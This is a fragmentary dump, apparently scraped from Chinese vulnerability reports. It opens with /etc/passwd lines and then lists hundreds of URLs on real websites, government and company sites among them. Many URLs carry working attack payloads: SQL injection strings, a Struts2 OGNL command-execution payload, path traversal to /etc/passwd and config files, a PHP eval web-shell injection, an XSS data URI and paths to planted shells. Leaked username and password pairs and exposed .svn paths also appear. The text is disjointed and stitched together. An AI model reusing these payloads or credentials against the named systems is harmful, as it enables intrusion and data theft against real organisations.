shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL 
daemon:/:/sbin/nologin ident:x:98:98::/home/ident:/sbin/nologin netdump:x:34:34:Network user:/var/crash:/bin/bash nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin canna:x:39:39:Canna User:/var/lib/canna:/sbin/nologin htt:x:100:101:IIIMF Htt:/usr/lib64/im:/sbin/nologin radiusd:x:95:95:radiusd user:/:/bin/false ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false named:x:25:25:Named:/var/named:/sbin/nologin cyrus:x:76:12:Cyrus Server:/var/lib/imap:/bin/bash quagga:x:92:92:Quagga suite:/var/run/quagga:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash hacluster:x:511:90::/home/hacluster:/bin/bash dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash radvd:x:75:75:radvd user:/:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin mailman:x:41:41:GNU Manager:/usr/lib/mailman:/sbin/nologin bea:x:512:512::/home/bea:/bin/bash wisentsoft:x:513:513::/home/wisentsoft:/bin/bash oracle:x:1001:1002::/home/oracle:/bin/bash http://m.koyimall.com/?act=shop.goods_view&GS=33427 http://zxks.gxeea.cn:8080/gxzkweb/Page/Index.jsp http://52xinyou.cn/anli.htm http://www.12wan.com http://www.eset.com.cn/news.php http://www.eset.com.cn//2009/0928/cmd.php http://www.eset.com.cn//win/lib/phpmailer/language/phpmailer.lang-zh.php http://www.eset.com.cn//diyold/upimage_bak/small/201005170111256099.gif.php.gif 
http://www.eset.com.cn//diyold/upimage_bak/201005170111256099.gif.php.gif http://www.eset.com.cn//diyold/upimage/small/201005170111256099.gif.php.gif http://www.eset.com.cn//diyold/upimage/small/201005261253437869.php4.jpg http://reg.eset.com.cn/renewal/head.php http://reg.eset.com.cn/renewal/order_view.php http://reg.eset.com.cn/mailer/language/phpmailer.lang-fc.php http://reg.eset.com.cn/bak/func/H.php http://reg.eset.com.cn/bak/func/test.php http://faq.eset.com.cn/class.phpmailer.php http://faq.eset.com.cn/templates/front/faq/order_view.php www.eset.com.cn/wwwnew/megau/images/bak/ http://www.weekedu.com/ http://www.weekedu.com/web_Org/New_Info.aspx?infoid=3397&typeid=4021 http://www.weekedu.com/web_Org/Course_Default.aspx?typeid=1&name=w'&Type=%E8%AF%BE%E7%A8%8B%E8%B5%84%E6%BA%90 http://52xinyou.cn/anli.htm http://otp.xdf.cn/otp http://otp.xdf.cn/otp/self_register这一步 http://otp.xdf.cn/otp/resources/www/201401/111009594tj9.jsp http://yjscc.shsmu.edu.cn/manage/login.jsp http://27.115.28.245:7777/server.txt ftp://ftp.htinns.com/: http://it.homeinns.com/ito_beta//Main/Login.aspx http://q601333824.duapp.com/3.js http://stat.ccidnet.com/getcode.php?website=100055 line:615 https://kyfw.12306.cn/otn/购买页面限制5秒查询一次,但购票接口无任何时间限制 http://xiaoxi.yonyou.com http://xiaoxi.yonyou.com/manage http://goldpen.ccidnet.com/goldpen/moreArticle.jsp?columnID=11 https://uhost.ucloud.cn http://g.ynet.com/games/plays.php?sid=74 http://g.ynet.com/games/plays.php?sid=74 http://youth1.ynet.com/activity.jsp?cgiMSActId=116 http://youth1.ynet.com/activity.jsp?cgiMSActId=116 http://182.50.1.243:8080/Intervention/Type?project=39 https://www.qingcloud.com/profile http://www.yhachina.com/ls.php?hostID=1&id=62&a=4 http://www.yhachina.com/topic.php?channelID=4&topicID=233 http://manage.shiwan.com/.svn/entries chang:chang zhangtao:zhangtao123 http://zjk.fjbid.gov.cn/Common/AjaxForm.aspx?t=checkUser&v=test123 http://123.127.50.2:8012/userlist.php http://123.127.50.2:8012/getmobile.cgi?receiver= 
http://123.127.50.2:8012/check.php http://www.whdrc.gov.cn/ http://work.crcc.cn/admin/protected/index.jsp http://share.v.t.qq.com/index.php?c=share&a=index&appkey=1459b2ac3d2345d2a17396eec5ad3bd7&url=http%3A%2F%2Fwww.douban.com%2Fphotos%2Fphoto%2F2165991570%2F&title=%E3%80%90%E8%A6%81%E7%9E%8E%E4%B8%80%E8%B5%B7%E7%9E%8E%E2%80%94%E2%80%94%E5%88%BA%E7%BB%A3%E3%80%91&pic=http%3A%2F%2Fimg3.douban.com%2Fview%2Fphoto%2Fphoto%2Fpublic%2Fp2165991570.jpg http://wooyun.org/bugs/wooyun-2010-013230 https://udb.ucloud.cn http://baoxian.qingdaonews.com/u/521*/logview1441.html http://baoxian.qingdaonews.com/product/list_all_all_1*_1.html http://df.health.qingdaonews.com/doc_search.aspx?page=1&key=1 http://finance.qingdaonews.com/bank/BankList.aspx?bid=4845&sq=0&area=0&text='&sort=pf1 http://finance.qingdaonews.com/bank/banklist_0_0_0_2'_pf1_1.html http://link.jiangmin.com/?id=doc_net http://eblog.cersp.com/fjptcx/zone.asp?op=logclass&z=2&keys=123'&so=blogname&province=undefined http://eblog.cersp.com/fjptcx/zone.asp?op=logclass&z=2 http://www.hydron.com.cn/activity.php?curr_page=activity2&id=11 http://www.hydron.com.cn/activity.php?curr_page=activity2&id=11%20order%20by%208-- http://www.tjmsa.gov.cn/ http://huanke.qingdaonews.com/show_userInfoClass.aspx?id=18&userId=summer_0229hui http://huanke.qingdaonews.com/u/catsily* http://auto.qingdaonews.com/wap/Picture.aspx?seriesid=26715&type=0 http://help.360shop.com.cn/?do=list&mod=faq https://frontier.jin.12306.cn/gateway/jndzsw/jnDzsw/action/ContainerCustomerAction_queryCreditView?fhdwdm=1'%22&fhdwmc=1&fzhzzm=1&fztmism=&qsrq=2014-01-11&zzrq=2014-01-11 http://www.post.com.cn/ http://smscom.12321.cn:8080/ROOT2013.tar http://crew.juneyaoair.com/admin_purser_an_detail.jsp?flight_date=2014-01-10&userCode=S2018641 http://demo.zoomla.cn/Plugins/Doc.aspx http://crew.juneyaoair.com/login.jsp http://crew.juneyaoair.com/upload/Imp138244_0.jsp http://demo.zoomla.cn/Guest/Baike/Classification.aspx?ClassTitle= http://m.koyimall.com 
http://m.koyimall.com/?act=board.board_view&bbs_seq=100 http://www.gznsjy.net/ http://register.ccidnet.com/passport/ http://game.msn.ynet.com/games/plays.php?sid=53 http://game.msn.ynet.com/games/plays.php?sid=53 http://dev.ucweb.com/ http://ht88.com/user/User_Down_Upload.asp http://jtst.moc.gov.cn:8086/Lanmu.aspx?LanmuID=1 http://wooyun.org/bugs/wooyun-2013-045257 magicbox:/pentest/database/sqlmap# http://admin.zqgame.com:9009/ http://admin.zqgame.com:9009/login?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27whoami%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 inurl:p-reg1.asp https://udb.ucloud.cn http://mail.nxcpic.gov.cn/ http://101.95.32.237:34440/AsFds_1378178109211_Fjc/?user=用户手机号码 http://www.ccidgroup.com/jeecms/ArtiSearch.do http://mail.robot.nankai.edu.cn/webmail http://mail.robot.nankai.edu.cn/webmail/userapply.php?execadd=333&DomainID=111 http://119.97.204.202/ydegov/index.aspx http://wooyun.org/bugs/wooyun-2010-019195 http://mail.hunantv.com/webmail/userapply.php?execadd=333&DomainID=111 http://bbs.lianzhong.com site:project.ccidnet.com http://tcl.iqiyi.com/index.php?action=daoyanjianjie&id=14 http://119.254.230.74:32766/agent/ http://www.lanyears.com/product.asp http://buy.yonyou.com http://buy.yonyou.com/web http://buy.yonyou.com/web/Common/UploadAttachment.aspx http://score.play.yy.com/1v1/zhanshi.php?roleid=-1%20union%20all%20select%201,1,1,1,62,1,1--%20-- http://www.haidilao.com/sg/index.php?m=admin http://tuku.fumu.com/play.php?imagegroupid=66 http://tuku.fumu.com/admin/ www.360shop.com.cn/login.php www.360shop.com.cn 
http://dynamic.hao.xunlei.com/paycenter?active=pick&number=768544 http://pinyin.sogou.com/dict/admin/index.php http://zcxh.hlje.net/admini/login.aspx http://www.hlje.net/e/tool/wsxf/index.php?MOD=view&id=10997 http://221.208.241.167:8080/login.action http://221.208.241.167:8080/nologin.jsp?o=vLogin http://221.208.241.167:8080/1.txt http://mail.shenyang.gov.cn/admin/password.php?password=admin&password2=admin http://space.100e.com/myspace/AddFriend/?UserID=787638 http://space.100e.com/myspace/AddFriend/?UserID=787638%27 http://space.100e.com/myspace/AddFriend/?UserID=787638 http://buy42.com/buy42/mainpage.do?action=index https://frontier.jin.12306.cn/gateway/jndzsw/jnDzsw/action/action/ContainerTzAction_queryTzdetail?id=2013101201 http://kongbao.airchina.com.cn/kbzb/default.jsp http://www.airmedia.net.cn/admin/ewebeditor/admin/login.php http://userinfo.baihe.com/NickName.action?time=1389597070516 http://ffp.juneyaoair.com/ http://ffp.juneyaoair.com/ http://buding.cn/.svn/entries http://piao.buding.cn/.svn/entries http://s.buding.cn/.svn/entries http://shequan.com/.svn/entries http://www.airmedia.net.cn/news/detials.php?infoid=312 http://www.airmedia.net.cn/news/detials.php?infoid=312 http://www.airmedia.net.cn/news/detials.php?infoid=312 http://www.airmedia.net.cn/news/detials.php?infoid=312 http://www.airmedia.net.cn/news/detials.php?infoid=312 http://www.airmedia.net.cn/news/detials.php?infoid=312 http://www.mymiles.com.cn/d/District_list.php?key=4 http://www.mymiles.com.cn/listlocationhx.php?Locationhx=%B1%B1%BE%A9%C4%CF%D4%B7%B9%FA%BC%CA%BB%FA%B3%A1&Ltype=S&City=%B1%B1%BE%A9 http://fan.yoka.com/mergeCss.php?file=/etc/passwd http://jwfile.juneyaoair.com:88/ http://jwfile.juneyaoair.com:88/ http://fan.yoka.com/mergeJavaScript.php?file=ftp:// http://都不能用了(environ那个也用不了,apache被降权了) http://wwwen.zte.com.cn/en/ http://www.vjianke.com/digest/ed5d68c170f748beab3ea20600b08a89.clip http://touch.podinns.com/GetPassword http://post.auto.tom.com/tom.php 
http://post.auto.tom.com/tom1.php http://post.auto.tom.com/tom111.php android:name=".contentprovider.AccountProvider android:permission="com.renren.xiaonei.android.permission.PERMISSION_ADD_ACCOUNT android:authorities="com.renren.xiaonei.account android:name=".contentprovider.BaseProvider android:permission="com.renren.xiaonei.android.permission.PERMISSION_ADD_ACCOUNT android:authorities="com.renren.xiaonei.base android:protectionLevel="dangerous",这个不够,声明这个权限又能够读取到信息 android:name="com.renren.mobile.android.permission.PERMISSION_ADD_ACCOUNT android:protectionLevel="dangerous android:name="com.renren.mobile.android.permission.PERMISSION_ADD_ACCOUNT http://www.ziroom.com/index.php?_a=click&_p=../../../../../etc/passwd%00.jpg http://ued.sogou.com/ http://ued.sogou.com/?author=2 http://ued.sogou.com/wp-login.php http://115.236.99.244:8080/login.jsp http://111.13.55.55/webmanage/index.jsp http://club.ellechina.com/forum.php这是dz1.5版本的论坛。我看着用户还是蛮活跃的,百度权重7,管理懂的我想说什么。 http://www.discuz.net/thread-2696203-1-1.html。我就说下我在注射这个的时候遇到的一个问题。正文开始 http://bbs.aili.com/thread-1768300-1-1.html http://club.jinti.com/operation/setmoodinfo.aspx http://club.jinti.com/operation/setmoodinfo.aspx?bodyid=52164&channel=a&classid=0&mood=mood1rand=0.10818770481273532 http://club.jinti.com/operation/setmoodinfo http://sqlmap.org http://web.59.cn/data.rar http://www.thegreatwall.com.cn/长城小站存在严重sql注入漏洞,以致3万多用户资料可能流出 http://www.jxnxs.com/ http://dream.sohu.com/.svn/entries http://holiday.sohu.com/.svn/entries http://www.simic.net.cn/ http://www.simic.net.cn/cc.php http://www.simic.net.cn/c.php http://www.simic.net.cn/cc.php?old_cid=1&new_cid=0 http://www.simic.net.cn/c.php?old_cid=1&new_cid=0 http://www.simic.net.cn/1.php http://域名/member/Register.asp http://fan.yoka.com/test1.php这里有个phpinfo http://www.ccard.org.cn/存在3个注入点。 http://www.ccard.org.cn/login.aspx,注入点:tb1 http://www.ccard.org.cn/login.aspx,注入点:tb2 http://www.ccard.org.cn/reg.aspx,注入点:tb1 
https://www.qiban365.com/zuhu/getpassword/Com_getPwd1.do http://www.capitalonline.net.cn/index.php/aboutus/index/id/8.html http://www.capitalonline.net.cn/index.php/aboutus/index/id/8*.html http://data.bank.hexun.com/card/xykcenter.aspx?no=1 http://data.bank.hexun.com/card/xykcenter.aspx?no=1 http://2012.moban.siteserver.cn/siteserver/cms/modal_contentTagAdd.aspx?PublishmentSystemID=2109&TagName=1'%20and%201=@@version%20and%201='1 http://wx.house365.com/admin/admincp/vote/adminvote.php?read= http://2012.moban.siteserver.cn/siteserver/UserRole/background_userAdd.aspx?UserName=yjfjnpuc'%20and%201=@@version%20and%201='1&ReturnUrl=../cms/console_user.aspx http://wx.house365.com/snhome/main.php?do=info http://2012.moban.siteserver.cn/siteserver/cms/modal_contentGroupAdd.aspx?PublishmentSystemID=2222&GroupName=123'%20and%201=@@version%20and%201='1 http://opac.jxlib.gov.cn/NTRdrBookRetrInfo.aspx?BookRecno=432145 http://hf.house365.com/admin/admincp/vote/adminvote.php?read=412 http://mall.heilanhome.com/?is_ajax&app_act=goods/comment&app_page=../../../../../../../../../../etc/passwd&goods_sn=HZSD4B031 http://www.jxsafety.gov.cn/templates/government/feedback/webzxlist.aspx?date1= http://ht.52xinyou.cn/ http://112.124.*.*/img.php?id=wxkj&c=3 http://121.199.*.*/js/v88/index.js http://movie.douban.com/subject/3804891/questions/155/ http://www.social-touch.com/ApplicationApply/AjaxGet_city http://www.social-touch.com/ApplicationApply/AjaxGet_city http://www.guobin.net/xxx/xxxxx.pdf http://www.guobin.net/xxx/ http://www.guobin.net/UpFiles/pdf/ http://hotel.heilan.com.cn/ http://hotel.heilan.com.cn/archives/detail.php?id=ylxx http://hotel.heilan.com.cn/install/ http://hotel.heilan.com.cn/ogilvy_sys/login.php# http://www.mosh.cn/about/?id=8 http://www.mosh.cn/about/?id=8 http://order.gmacsaic.net/index.jsp http://t.atlenovo.com/php.php http://street.atlenovo.com/guest/addAllFriend.php http://ce.atlenovo.com/products_last.php?id=60 street.atlenovo.com/guest/feedbackdo.php 
http://www.tyresort.com/hr/jobs.html http://xy006.52xinyou.cn/api/remote/login.ashx?cid=0.3394278590029699&callback=jsonp1389690871382&uid=test%27&pwd=adfadsf&rem=false http://xy006.52xinyou.cn/api/remote/login.ashx?cid=0.3394278590029699&callback=jsonp1389690871382&uid=test&pwd=adfadsf&rem=false http://v.yonyou.com/uc_server/ http://crew.juneyaoair.com http://crew.juneyaoair.com/flight_vip_info.jsp?flightdate=2013/10/17&flightno=HO1287&departport=ZSSS&destport=ZGGG http://wsyc.lqwang.com http://www.jxyxfda.gov.cn/info.asp?ID=326 http://www.jxyxfda.gov.cn/banshi.asp?page=1&id=4 http://www.wxgtzyj.gov.cn/guanli/login.asp http://www.tizistar.com/ http://hotel.heilan.com.cn/ http://tool.114la.com http://tool.114la.com/?ac=wapview_api&ct=site&Data=&Method=get&URL=../../../../../../../../../../etc/hosts http://tool.114la.com/?ac=wapview_api&ct=site&Data=&Method=get&URL=../../../../../../../../../../etc/group http://tool.114la.com/?ac=wapview_api&ct=site&Data=&Method=get&URL=../../../../../../../../../../etc/resolv.conf http://tool.114la.com/?ac=wapview_api&ct=site&Data=&Method=get&URL=../../../../../../../../../../etc/passwd http://www.baidu.com/s?wd=inurl%3Atype.do%3Ftid%3D url:http://www.allyes.com/index.php/Service/index/id/8.html http://www.allyes.com/index.php/Service/index/id/8*.html http://www.allyes.com/admin.php http://www.pziad.com/cx/cxa300-250.php?id=966 http://ht.52xinyou.cn/xykj/login.aspx http://ht.52xinyou.cn/xykj/login.aspx www.yiban.cn http://www.aosclub.com/discuz/forum.php http://www.discuz.net/thread-2696203-1-1.html http://drops.wooyun.org/papers/548 http://www.hapa.gov.cn/ http://sz.focus.cn/common/group/hdzdy/hd_fenlei.php?lx=jdtj http://tuan.joyoung.com的安全。 http://tuan.joyoung.com url-http://testdb.39.net/ http://wizard.stock.hexun.com/zlkpf/more.aspx?canshu=34 http://gr.xidian.edu.cn/paginationAction.do?id_xxnr=18 http://academy.yonyou.com http://academy.yonyou.com/StaffHome/ViewMapZsPage.aspx?order=z_products&isget=all&name= 
http://506srm.cofco.com/custom/GroupNewsList.aspx?GroupId=157 http://en.hundsun.com/zhaopin/selectPosition.do http://www.hundsun.com/zhaopin/selectPosition.do http://www.hundsun.com/wooyun.txt http://dream.yiban.cn/schoolvideo.php?id=36 http://219.146.13.148:8080/ http://116.113.105.165:8002/yydj/jhyy-ok.asp?AIAID=1135 http://mm.5see.com/ http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab#version=8,0,0,0 clsid:D27CDB6E-AE6D-11cf-96B8-444553540000 http://edu.qzs.qq.com/music/musicbox_v2_1/img/MusicFlash.swf http://11.com/1.wma|bbbbbbb|0|aaaaaa|0 http://edu.qzs.qq.com/music/musicbox_v2_1/img/MusicFlash.swf http://edu.qzs.qq.com/music/musicbox_v2_1/img/MusicFlash.swf http://xsst.sinaapp.com/Xss.swf http://xsst.sinaapp.com/Xss.swf http://r.hexun.com/ql.php?reporttime=7 http://r.hexun.com/ql.php?reporttime=7 http://r.hexun.com/ql.php?reporttime=7 https://passport.baidu.com/?getpassindex&tpl=mn&u=http%3A%2F%2Fwww.baidu.com%2F,完全没问题啊,扫一下二维码直接重置。 http://game.25pp.com/ http://www.jincheng18.com/userLogin_hasLogin.action http://www.jincheng18.com/userLogin_hasLogin.action http://app.sdcp.cn/fccms/ mail:cecs@mail.cin.gov.cn http://www.cecs.org.cn/ http://www.cecs.org.cn//Script/Script.js http://hd.baofeng.com/go/aHmDz22.html(太奇怪了,这明明是暴风影音的域名啊) http://www.amazon.cn/?tag=nd220031-23 http://www.amazon.cn/ref=z_cn?tag=zcn0e-23。 http://219.146.13.105:8099/school/loginAction.do http://219.146.13.105:8099/ http://sports.m.letv.com/sports/originalColumn/list http://sports.m.letv.com/sports/originalVideo/list?columnId=1 http://passport.kongzhong.com/pwdback/pwdmobileback/pwdback_mobile http://www.tt-xx.com/ http://hbj.serc.gov.cn/ywdd.jsp?id1=0001&id2=&id3=&id4=&content=%D2%AA%CE%C5%B5%BC%B6%C1 http://222.216.29.34/ http://www.zzmetro.cn/index.html http://www.zzmetro.cn/adminindex.jsp http://partner.yonyou.com/Channel/Channel/ http://ht.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 http://xy001.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 
http://xy002.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 http://xy003.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 http://xy004.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 http://xy005.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 http://xy006.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 http://ui.letv.com/ http://ui.letv.com/uc_server http://wzxmt.want-want.com/ http://mail.yinqiaogroup.com/webmail/userapply.php?execadd=333&DomainID=111 http://u8dev.yonyou.com/ http://u8dev.yonyou.com/home/blog/index.aspx?r=all&key=0&text_key=1 http://www.yiban.cn/webim/.svn/entries站点的svn侧漏,下载下来部分源码 http://www.zznx.com.cn/ http://sms.cnpostair.com/login.jsp http://www.jianshe.com.cn/CommonFile/Cx_DynamicInfo.aspx?kindName=创新技术&secondId=1033&thirdID=&Description=产品研发&ShowTypeId=156 http://www.eset.com.cn/share/getLang.php http://www.eset.com.cn/share/getLang.php https://uhost.ucloud.cn/bandwidth/create_shared_bandwidth_package http://zhaopin.hi.chinamobile.com/hr/recruit/candidate_portal_info.ac?candidateId=12345&print=true http://zhaopin.hi.chinamobile.com/hr/recruit/candidate_portal_info.ac?candidateId=12345&print=true http://zhaopin.hi.chinamobile.com/hr/recruit/candidate_portal_info.ac?candidateId=12345&print=flase http://www.csbidding.com/nhzb/login2.jsp http://www.csbidding.com/nhzb/login3.jsp http://www.csbidding.com/nhzb/login4.jsp http://beian.cndns.com http://beian.cndns.com/icpadmin.php?module=admin_icp_hshow&id=473953 http://beian.shopex.cn/ http://beian.cndns.com/ http://icp.gwbnsh.net.cn/ http://beian.ocn.net.cn/ http://bbs.aili.com/home-space-uid-1051999-do-profile-view-me.html http://202.108.16.139/ http://data.futures.hexun.com.tw/ccjg.aspx?page=2&sBreed=10301010000&sCompanyID=154&sDate=2014-01-10 http://data.futures.hexun.com.tw/dpic/drawccjj.ashx?sBreed=10301010000&sCompanyID=154&sContract=A1405&sCyc=1 
http://data.futures.hexun.com.tw/dpic/drawjcgc.ashx?sBreed=10301010000&sCompanyID=154&sContract=A1405&sCyc=1 http://data.futures.hexun.com.tw/jcgc.aspx?page=1&sBreed=10301010000&sCompanyID=154&sContract=A1405&sCyc=1 http://data.futures.hexun.com.tw/ykfx.aspx?scompanyid=154&scontract=A1405 http://yueyu.kuaiapp.cn/lists.php?newsid=80 http://yueyu.kuaiapp.cn/lists.php?newsid=80 http://202.108.16.132/qrcode/list.action http://202.108.16.139/redirect.action?id=1 http://202.108.16.194/ http://202.108.16.194/cntv_news/index.php http://gp.people.com.cn/yangshuo/skygb/sk/index.php/Index/login http://selfservice.ikuai8.com/ http://125.88.6.155/coms/login.jsp报关管理系统漏洞来 http://125.88.6.155/coms/updatepword.jsp?username=123&oldpasswd=123&newpasswd=123&snewpasswd=123 http://www.qycn.com/ajax.request.php url:http://ebusiness.minshenglife.com:8001/mssug/indexlis.jsp http://www.91job.gov.cn:2008/fckeditor/editor/filemanager/connectors/aspx/connector.aspx http://www.fckeditor.net http://www.tclbusiness.com/ http://dg.tgbus.com/Search.aspx?app=1&extname=&flag=0&isid=0&keyword=&page=3&productid=0&typeid=0 http://www.libsys.com.cn/downloadmore.php?pid=libsys5.0new http://hndczx.mep.gov.cn/mo/list.jsp?key=hbyq&page=1 http://www.jshp.com.cn/xwbf.php?path=999999 http://www.eset.com.cn/news.php http://www.wuliangye.com.cn/download.xml?id=28&path=../../../../../../../../../../etc/passwd%00 www.wochacha.com/news_read_c_3_id_343.html www.wochacha.com/news_read_c_3 www.wochacha.com/news_read_c_3 http://m.koyimall.com/?act=shop.goods_list&GC=GD00&ST=SCODE1 http://m.koyimall.com/?act=board.board_view&bbs_seq=100 http://m.koyimall.com/?act=shop.goods_view&GS=63611%20and%201=2 http://user.tgbus.com页面随便注册一个账号 http://e-learn.airchina.com.cn http://51.eset.com.cn/ index.php/user/lookpwd http://51.eset.com.cn/ http://60.13.122.83:8080/ http://f.game.tom.com/admin.php?mod=phpcms&file=index&action=index www.eset.com.cn http://pc.51zhangdan.com/service/log4net.xml http://pc.51zhangdan.com/service/ 
http://pc.51zhangdan.com/assets/ http://pc.51zhangdan.com/service/log/ http://pc.51zhangdan.com/service/%E5%A4%8D%E4%BB%B6%20%284%29%20bin/log4net.xml http://pc.51zhangdan.com/service/%E5%A4%8D%E4%BB%B6%20%284%29%20bin/MongoDB.Bson.xml http://pc.51zhangdan.com/service/%E5%A4%8D%E4%BB%B6%20%284%29%20bin/MongoDB.Driver.xml http://www.l000s.com http://www.l000s.com/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/aspx/connector.aspx www.shehr.cn http://www.shehr.cn/office/guestbook.php www.shehr.cn http://www.sogou.com/complain/complaint.php?type=3 www.sogou.com http://www.wuxia.renren.com/ http://www.wuxia.renren.com/ www.wuxia.renren.com www.kuaidadi.com http://xxx/admin_login.php登陆 http://xxx/admin/index.php即可进入后台 http://www.skyclass.net/ http://www.liufeng888.cn/ http://dx.skyclass.net/ http://61.138.252.201/ http://61.128.110.144/ http://61.128.122.136/ http://124.117.243.78/ http://202.117.16.193/ http://www.xjcxedu.cn/ http://www.skyclass.net/news.php?sid=4 http://124.117.225.166/eis/index.action www.wooyun.org/bugs/wooyun-2010-02480的后面操作是一样的 course.buct.edu.cn/homepage/common/opencourse/ http://www.nsii.org.cn/e_inscode_dist.php?id=5 http://home.mama.cn/index.php?a=Pic&d=index&g=Gallery&rtypeid=1 inurl:life/jiufang http://www.xxxxx.com/tools/life/jiufang/index.php?q={${phpinfo%28%29 http://www.xxxxx.com/tools/life/jiufang/index.php?q={${eval%28$_POST[k]%29 http://shop.gz163.cn/kuandai.php?act=post_order http://yxt.gz163.cn/ http://221.176.65.1 http://221.176.65.3/ http://221.176.65.3/登录位置,可以看到部分的员工登录信息,隶属移动的旗下单位,以及一些合作商的信息,看后台源代码。没找到更多的信息,后来, http://221.176.65.3/Org/MoreLoginUserList.aspx?UserType=si http://221.176.65.3/login/LoginDetails.aspx?UserID=b26da40d26bf4e27941ad7706832d097 http://192.168.1.1/GateWay/RosApi.asmx http://192.168.1.1/GateWay/RosApi.asmx?op=CheckLoginUser http://192.168.1.1/GateWay/RosApi.asmx?op=SetUserOffLine data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+ 
http://www.jxdcn.gov.cn/page_notice.asp?classname=公告&id=2216 http://www.jxdcn.gov.cn/page_netschool.asp?classname=种植技术&id=749 http://www.jxdcn.gov.cn/readbook.asp?id=940 http://www.jxdcn.gov.cn/lecture_video.asp?id=296 http://www.jxdcn.gov.cn/page_content.asp?classname=县中心动态&id=1968 http://www.jxdcn.gov.cn/readbook.asp?id=940 http://www.ynwh.net/bolanhui.jsp?id=109 http://www.doov.com.cn/tbw68.php http://www.doov.com.cn/qin.txt http://www.cngrid.org/jeeadmin/jeecms/index.do ftp://221.15.*.*/ http://61.168.11.30:8011/new_mss/ http://ha.mail.chinaunicom.cn/ https://www.mii-aqfh.cn/ name:cu_h pw:ptNGphd2 http://61.168.11.30:8011/new_mss/ http://www.iheilan.com/ http://cee.gov.cn/admin/main.html http://brandbase.mama.cn/zhangguang.php?mod=yuyue&op=main&province=19&type=getcitys http://wooyun.org/bugs/wooyun-2013-044362 http://www.zte-d.com/upload/techinfo/20140118_9fc3d7152ba9336a670e36d0ed79bc43.php http://www.kfcz.gov.cn/fckeditor/editor/filemanager/browser/default/browser.html?Type=../../..&Connector=connectors/jsp/connector http://www.kfcz.gov.cn/userSites/kfcz/inc/left.jsp http://fy.hnsfj.gov.cn/Login.action http://www.gs.10086.cn/service/obsh.html#GPRSTC http://wap.gs.10086.cn/page.do?page=CX_ZYYW&busiNum=CX_ZYYW&reqHandle=queryHandle http://so.liuzhou.gov.cn:8080/inforadar/jsp/file/file_download.jsp?fileType=file&fileName=../../file/file_download.jsp http://ued.huatu.com http://ued.huatu.com/?author=2 www.thyuwen.com www.51taoshi.com www.51taoshi.cn TOP2:51taoshi.com旁站struts2 hbjjxt.e21.cn/loadLogin.action?redirect:http://www.yahoo.com/ http://hbjjxt.e21.cn/loadLogin.action http://lib.bit.edu.cn https://viaforensics.com/mobile-security/chained-vulnerabilities-firefox-android-pimp-browser.html http://www.pigai.org/index.php?c=v2&a=write&rid=307629&eid= http://www.pigai.org/index.php?c=v2&a=write&rid=200052&eid= http://www.pigai.org/index.php?c=v2&a=write&rid=222777&eid= http://www.pigai.org/index.php?c=v2&a=write&rid=298434&eid= 
http://www.osmun.com.cn/admin/upload.aspx http://mail.72e.net:88//upload/message/72e.net/20130121/fix.php http://mail.72e.net:88//upload/attach/szzoo.net/zmh/2013092617261562693_138022563_eml/1/2013092617261562693_138022563_eml_1.html http://mail.72e.net:88/login.php?lang=../config/config_inc http://mail.72e.net:88/login.php?lang=../config/config.inc http://www.jxbys.net.cn/zscx/cxbdzqk.asp www.jxbys.net.cn http://cos.sto.cn/docs/DocBrowserMain.jsp?url=/page/maint/common/UserResourceBrowse.jsp?file=none http://cos.sto.cn//js/swfupload/ http://cos.sto.cn/page/resource/userfile/image/top001.jsp http://legend.7daysinn.cn/Login.aspx http://mt.7daysinn.cn/EditProblemInfo.aspx?Operate=2&InfoID=128971 http://news.baidu.com/cache_ns?&from=news&cl=2&rn=20&ct=1&tn=json&ie=utf-8&x=callback&word=1 http://www.jjwxc.net/comment.php?allstr=&kstr=a&orderstr=1&tj=0 line:580 